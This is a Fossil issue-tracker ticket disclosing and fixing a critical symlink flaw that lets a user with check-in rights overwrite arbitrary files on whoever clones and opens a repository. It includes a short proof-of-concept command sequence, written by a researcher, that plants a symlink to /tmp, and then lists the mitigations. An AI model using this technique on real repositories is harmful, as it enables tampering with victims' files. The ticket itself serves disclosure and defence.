Fossil: View Ticket

Ticket Hash:	f9831fdef1d4edccd10e4e416062820b63a15ee4
Title:	Arbitrary file overwrite using symlinks
Status:	Fixed	Type:	Code_Defect
Severity:	Critical	Priority:	Immediate
Subsystem:		Resolution:	Fixed
Last Modified:	2020-08-19 00:18:49 5.62 years ago	Created:	2020-08-17 08:39:03 5.62 years ago
Version Found In:

User Comments:
drh added on 2020-08-17 08:39:03: A malicious user with check-in privileges can overwrite arbitrary files on a victim's system by exploiting weaknesses in the symlink mechanism of Fossil. Max Justicz provides the following demo: `fossil init oops.fossil mkdir checkout cd checkout fossil open ../oops.fossil ln -s /tmp/ link fossil add link fossil commit -m "add link" echo "oops" > link/foo.txt fossil add link/foo.txt fossil commit -m "add foo" # Remove the file so we can show the exploit works rm /tmp/foo.txt cd .. fossil serve oops.fossil # In another terminal fossil clone http://localhost:8080/oops.fossil oops2.fossil mkdir checkout2 cd checkout2 fossil open ../oops2.fossil # /tmp/foo.txt was created! cat /tmp/foo.txt` drh added on 2020-08-17 19:03:53: Mitigations from check-in ff98dd5af61aef30ca4: The allow-symlinks setting is off by default. Users must explicitly enable symlink support in order for Fossil to create symlinks. The allow-symlinks setting is no longer a versioned setting. It must be set manually by the developer who wants to use it. The allow-symlinks setting no longer propagates via clone. The setting continues to be off by default for clones even if it is on in the server. drh added on 2020-08-19 00:18:49: Additional defenses: When checking out files, do not write files that are beneath a symlink in the check-out. When doing a "fossil add" ignore files that are beneath a symlink.